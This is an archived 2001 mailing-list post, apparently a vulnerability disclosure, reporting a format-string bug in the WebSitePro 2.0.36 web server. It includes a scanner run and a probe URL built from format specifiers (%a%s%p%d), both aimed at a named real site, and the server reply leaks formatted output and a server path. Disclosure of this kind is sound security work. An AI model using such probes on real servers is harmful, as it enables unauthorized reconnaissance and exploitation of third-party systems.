$ ./psec www.estacio.br -h P-SEC version 1.0 (alpha) - by Paulo Ribeiro, Dec. 2001. - Date: Sun Dec 23 00:38:25 2001 - HTTP Server: WebSitePro version 2.0.36 * Alert: HTTP server may be vulnerable. -- Checking possible vulnerabilities: <cut> ---- Format bug (GET): found. (try http://host/%a%s%...) <cut> $ Now, let's try to access the following link: http://www.estacio.br/%a%s%p%d Here's what we get: 1 404 Not Found 2 3 The requested URL was not found on this server: 4 5 /*s?d 6 7 (C:/WebSite/htdocs/*s?d) So, we have: line 5: format bug. line 7: format bug + its path. I don't know if this bug has already been fixed, as I've tested the version 2.0.36. Yours, Paulo Ribeiro - prrarat_private IME - www.ime.eb.br CSB - www.csbrj.org.br
This archive was generated by hypermail 2b30 : Sun Dec 23 2001 - 08:10:37 PST